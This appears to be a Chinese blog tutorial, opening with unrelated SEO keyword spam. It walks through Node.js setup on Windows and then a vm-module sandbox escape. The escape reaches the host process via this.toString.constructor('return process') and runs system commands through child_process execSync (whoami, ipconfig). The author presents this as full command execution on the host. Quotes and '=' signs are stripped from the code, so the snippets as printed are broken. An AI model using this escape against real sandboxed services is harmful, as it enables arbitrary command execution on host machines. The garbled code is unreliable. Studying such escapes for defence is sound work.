国家图书馆网站建设介绍,做物理的网站,php网站 源码,seo专业培训网络班目录 一. 配置环境1.下载nodejs2.nodejs配置3.报错解决方法 二. nodej沙箱绕过1. vm模块2.使用this或引用类型来进行沙箱绕过 一. 配置环境
1.下载nodejs
官网#xff1a;https://nodejs.org/en2.nodejs配置
安装nodejs的msi文件#xff0c;默认配置一直下一步即可#x… 目录 一. 配置环境1.下载nodejs2.nodejs配置3.报错解决方法 二. nodej沙箱绕过1. vm模块2.使用this或引用类型来进行沙箱绕过 一. 配置环境
1.下载nodejs
官网https://nodejs.org/en2.nodejs配置
安装nodejs的msi文件默认配置一直下一步即可以下步骤以默认安装为准如有安装位置改变请自行更改环境变量里面的配置。 继续进行环境变量的配置 用户变量如下 系统变量如下 编辑PATH添加如下 在默认安装位置新建如下两个文件 node_cache是放安装过程的缓存文件 node_global是存放安装模块配置位置 测试是否安装成功 继续执行如下命令
npm config set prefix C:\Program Files\nodejs\node_global
npm config set cache C:\Program Files\nodejs\node_cache安装cluster进行测试
npm install cluster -g3.报错解决方法
如有报错请尝试给nodejs默认安装目录提升用户权限来解决。
二. nodej沙箱绕过
1. vm模块
const vm require(vm);
const script m n;
const sandbox { m: 1, n: 2 };
const context new vm.createContext(sandbox);
const res vm.runInContext(script, context);
console.log(res)运行结果
2.使用this或引用类型来进行沙箱绕过
this指向的是sandbox,我们可以获得一个tosString方法通过toString方法来获得一个构造函数。 所有函数都是由Fuction创造出来的,我们的目的是拿到process模块 因为constructor本身指向它的构造函数所以我们可以利用constructor函数来拿到Function函数 沙盒逃逸就是要把外面的元素或者对象引入进来。 如下此时是利用this
const vm require(vm);
const script
const process x.toString.constructor(return process)()
process.mainModule.require(child_process).execSync(whoami).toString()
;const sandbox { m: [], n: {}, x:/regexp/};
const context new vm.createContext(sandbox);
//const res vm.runInContext(script, context);
const res vm.runInContext(script,context)
console.log(res)
我们把“x”替换为this也是可以成功执行的此时m和n可以是任意.,这个是利用了引用类型比如{}。 const vm require(vm);
const script
const process this.toString.constructor(return process)()
process.mainModule.require(child_process).execSync(ipconfig).toString()
;const sandbox { m: 1, n: 2 };
const context new vm.createContext(sandbox);
//const res vm.runInContext(script, context);
const res vm.runInContext(script,context)
console.log(res)whoami成功执行代表着此时已经可以任意命令执行 用户learnpc是我的管理员用户
比如我们这里在执行以下ipconfig来进行验证 以上便是经典的沙箱逃逸来执行命令当我们可以执行命令的时候便说明我们其实已经成功拿下。此时也可执行其他不好的命令。